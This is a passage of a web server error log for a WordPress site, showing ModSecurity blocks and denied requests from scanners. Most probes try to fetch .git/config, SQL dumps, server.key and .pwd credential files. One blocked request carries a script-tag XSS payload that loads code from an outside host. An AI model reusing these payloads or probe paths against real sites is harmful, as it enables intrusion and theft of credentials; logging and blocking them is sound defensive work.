"(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "Zu0_qhaWkKVRMvPBqsVAIwAAAAM"], referer: www.google.com [Fri Sep 20 04:26:09.426485 2024] [:error] [pid 28516:tid 139813820299008] [client 144.126.128.225:34258] [client 144.126.128.225] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "Zu0_sdSCxGK1pDMNJCXlJAAAAEU"], referer: www.google.com [Fri Sep 20 09:01:08.938405 2024] [authz_core:error] [pid 28517:tid 139813837084416] [client 147.182.200.94:38790] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/09/20 09:01:14 [error] 28478#28478: *360660 access forbidden by rule, client: 147.182.200.94, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri Sep 20 23:26:50.503681 2024] [autoindex:error] [pid 28517:tid 139813642520320] [client 154.12.246.14:55666] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Sep 20 23:27:09.136069 2024] [autoindex:error] [pid 28514:tid 139813617342208] [client 154.12.246.14:55686] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/IXR/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Sep 20 23:27:11.755954 2024] [autoindex:error] [pid 28514:tid 139813600556800] [client 154.12.246.14:55690] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Sep 21 03:45:39.031855 2024] [ssl:warn] [pid 31547:tid 140191506409344] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 21 03:45:39.385296 2024] [ssl:warn] [pid 31548:tid 140191506409344] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 21 03:45:39.887728 2024] [ssl:warn] [pid 31548:tid 140191506409344] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 21 03:45:42.312496 2024] [ssl:warn] [pid 31548:tid 140191506409344] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 21 03:45:44.819124 2024] [ssl:warn] [pid 31968:tid 140530110318464] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 21 03:45:45.286236 2024] [ssl:warn] [pid 31969:tid 140530110318464] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 21 04:23:16.002187 2024] [autoindex:error] [pid 32647:tid 140529794778880] [client 207.244.234.180:60128] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Sep 21 04:23:32.817613 2024] [autoindex:error] [pid 31986:tid 140529803171584] [client 207.244.234.180:60146] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/IXR/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Sep 21 04:23:39.901559 2024] [autoindex:error] [pid 31988:tid 140529668888320] [client 207.244.234.180:60150] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Sep 21 18:43:58.421511 2024] [ssl:warn] [pid 1011:tid 140680266278784] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 21 18:43:59.299093 2024] [ssl:warn] [pid 1135:tid 140680266278784] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 21 23:05:36.856971 2024] [authz_core:error] [pid 1937:tid 140679925700352] [client 159.89.17.243:38084] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/09/21 23:05:40 [error] 1684#1684: *2209 access forbidden by rule, client: 159.89.17.243, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/09/22 00:44:51 [error] 1684#1684: *3140 access forbidden by rule, client: 167.99.182.39, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/09/22 00:44:51 [error] 1685#1685: *3174 access forbidden by rule, client: 159.203.96.42, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/09/22 00:44:51 [error] 1684#1684: *3207 access forbidden by rule, client: 172.105.158.219, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/09/22 00:44:53 [error] 1684#1684: *3276 access forbidden by rule, client: 157.245.36.108, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/09/22 00:44:57 [error] 1684#1684: *3344 access forbidden by rule, client: 64.227.32.66, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Sun Sep 22 00:45:04.821447 2024] [authz_core:error] [pid 1159:tid 140679967663872] [client 165.227.39.235:39986] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Sun Sep 22 00:45:05.910778 2024] [authz_core:error] [pid 1937:tid 140679833380608] [client 64.226.65.160:39998] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/09/22 00:45:08 [error] 1684#1684: *3423 access forbidden by rule, client: 165.227.39.235, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/09/22 00:45:11 [error] 1684#1684: *3433 access forbidden by rule, client: 64.226.65.160, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/09/22 00:46:33 [error] 1684#1684: *3662 access forbidden by rule, client: 179.43.168.130, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/09/22 01:46:02 [error] 1685#1685: *5077 access forbidden by rule, client: 3.137.222.205, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sun Sep 22 07:39:03.354099 2024] [authz_core:error] [pid 13925:tid 140019029182208] [client 139.59.136.184:47296] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/09/22 07:39:08 [error] 13888#13888: *7878 access forbidden by rule, client: 139.59.136.184, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sun Sep 22 10:30:48.618497 2024] [autoindex:error] [pid 14212:tid 140019129894656] [client 4.213.113.19:49010] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2024/09/22 12:45:25 [error] 13887#13887: *9856 access forbidden by rule, client: 213.232.87.230, server: mail.investigacionperu.com, request: "GET /.svn/wc.db HTTP/1.1", host: "mail.investigacionperu.com" 2024/09/22 12:45:25 [error] 13887#13887: *9874 access forbidden by rule, client: 213.232.87.230, server: mail.investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "mail.investigacionperu.com" 2024/09/22 12:45:26 [error] 13888#13888: *9960 access forbidden by rule, client: 109.202.99.46, server: webmail.investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "webmail.investigacionperu.com" 2024/09/22 12:45:26 [error] 13888#13888: *9949 access forbidden by rule, client: 109.202.99.46, server: webmail.investigacionperu.com, request: "GET /.svn/wc.db HTTP/1.1", host: "webmail.investigacionperu.com" [Sun Sep 22 12:45:26.774762 2024] [:error] [pid 14212:tid 140019029182208] [client 213.232.87.232:50670] [client 213.232.87.232] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/dump.sql"] [unique_id "ZvBXthkO0fkeRsQrQ2SGaAAAANQ"] 2024/09/22 12:45:26 [error] 13888#13888: *10012 access forbidden by rule, client: 213.232.87.232, server: investigacionperu.com, request: "GET /.svn/wc.db HTTP/1.1", host: "investigacionperu.com" [Sun Sep 22 12:45:26.777669 2024] [:error] [pid 14212:tid 140019255826176] [client 213.232.87.232:50684] [client 213.232.87.232] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "ZvBXthkO0fkeRsQrQ2SGaQAAAME"] 2024/09/22 12:45:26 [error] 13888#13888: *10042 access forbidden by rule, client: 213.232.87.232, server: investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "investigacionperu.com" [Sun Sep 22 12:45:26.810880 2024] [:error] [pid 13925:tid 140019255826176] [client 213.232.87.232:50682] [client 213.232.87.232] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/web.config"] [unique_id "ZvBXtutOMcNmsa0T4iCK5wAAAEE"] [Sun Sep 22 12:45:26.828908 2024] [:error] [pid 13925:tid 140019230648064] [client 213.232.87.232:50722] [client 213.232.87.232] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/_vti_pvt/administrators.pwd"] [unique_id "ZvBXtutOMcNmsa0T4iCK6gAAAEQ"] [Sun Sep 22 12:45:26.832969 2024] [:error] [pid 13926:tid 140019146680064] [client 213.232.87.232:50706] [client 213.232.87.232] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/backup.sql"] [unique_id "ZvBXtnibC8IrPkeeL3oQ4wAAAIY"] [Sun Sep 22 12:45:26.843786 2024] [:error] [pid 13924:tid 140019079538432] [client 213.232.87.232:50728] [client 213.232.87.232] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/etc/ssl/private/server.key"] [unique_id "ZvBXtk_ICrL6J64p4pY8iQAAAA4"] [Sun Sep 22 12:45:26.855542 2024] [:error] [pid 14212:tid 140019138287360] [client 213.232.87.232:50716] [client 213.232.87.232] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/server.key"] [unique_id "ZvBXthkO0fkeRsQrQ2SGbQAAAMc"] [Sun Sep 22 12:45:26.895787 2024] [:error] [pid 13924:tid 140018995611392] [client 213.232.87.232:50742] [client 213.232.87.232] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/database.sql"] [unique_id "ZvBXtk_ICrL6J64p4pY8kAAAABg"] [Sun Sep 22 12:45:26.897826 2024] [:error] [pid 13924:tid 140019121501952] [client 213.232.87.232:50744] [client 213.232.87.232] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/_vti_pvt/authors.pwd"] [unique_id "ZvBXtk_ICrL6J64p4pY8kQAAAAk"] [Sun Sep 22 12:45:26.928307 2024] [authz_host:error] [pid 13925:tid 140019062753024] [client 213.232.87.232:50724] AH01753: access check of 'localhost' to /server-status failed, reason: unable to get the remote host name [Sun Sep 22 12:45:26.928372 2024] [authz_core:error] [pid 13925:tid 140019062753024] [client 213.232.87.232:50724] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/09/22 13:18:38 [error] 13887#13887: *10293 access forbidden by rule, client: 179.43.168.130, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sun Sep 22 13:58:55.345540 2024] [:error] [pid 952:tid 140019264218880] [client 179.43.191.19:51544] [client 179.43.191.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[^>]*>|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[[\\\\s\\\\S]]*[\\\\s\\\\S]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[\\\\s]*[\\\\s]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script|<script[^>]*>[\\\\s\\\\S]*?)" at ARGS:result[_msg]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "14"] [id "973336"] [rev "1"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script src=https://zeroday2024.com/admin-bar-reloaded.min.js></script> found within ARGS:result[_msg]: <script src=https://zeroday2024.com/admin-bar-reloaded.min.js></script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-json/litespeed/v1/cdn_status"] [unique_id "ZvBo726O8Di1f0d0nd2bpAAAAQA"], referer: https://investigacionperu.com 2024/09/22 16:28:24 [error] 13888#13888: *12078 access forbidden by rule, client: 195.178.110.21, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/09/22 17:16:29 [error] 13888#13888: *12872 access forbidden by rule, client: 195.178.110.21, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/09/22 17:21:47 [error] 13888#13888: *12921 access forbidden by rule, client: 195.178.110.21, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/09/22 17:22:42 [error] 13887#13887: *12927 access forbidden by rule, client: 195.178.110.21, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/09/22 17:34:18 [error] 13887#13887: *13009 access forbidden by rule, client: 195.178.110.21, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Mon Sep 23 09:50:36.762319 2024] [:error] [pid 14822:tid 140340027696896] [client 193.34.213.138:40844] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Mon Sep 23 10:14:46.550970 2024] [autoindex:error] [pid 31207:tid 140340198151936] [client 193.34.213.138:42518] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:14:50.142685 2024] [:error] [pid 31208:tid 140340010911488] [client 193.34.213.138:42524] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Mon Sep 23 10:15:24.324408 2024] [autoindex:error] [pid 32343:tid 140340044482304] [client 193.34.213.138:42618] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:15:28.691798 2024] [autoindex:error] [pid 32343:tid 140339968947968] [client 193.34.213.138:42628] AH01276: Cannot serve directory /home/investig/public_html/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:15:40.086937 2024] [autoindex:error] [pid 32623:tid 140340181366528] [client 193.34.213.138:42656] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:15:46.515729 2024] [autoindex:error] [pid 32623:tid 140340164581120] [client 193.34.213.138:42672] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:15:58.627090 2024] [autoindex:error] [pid 32622:tid 140340002518784] [client 193.34.213.138:42696] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex 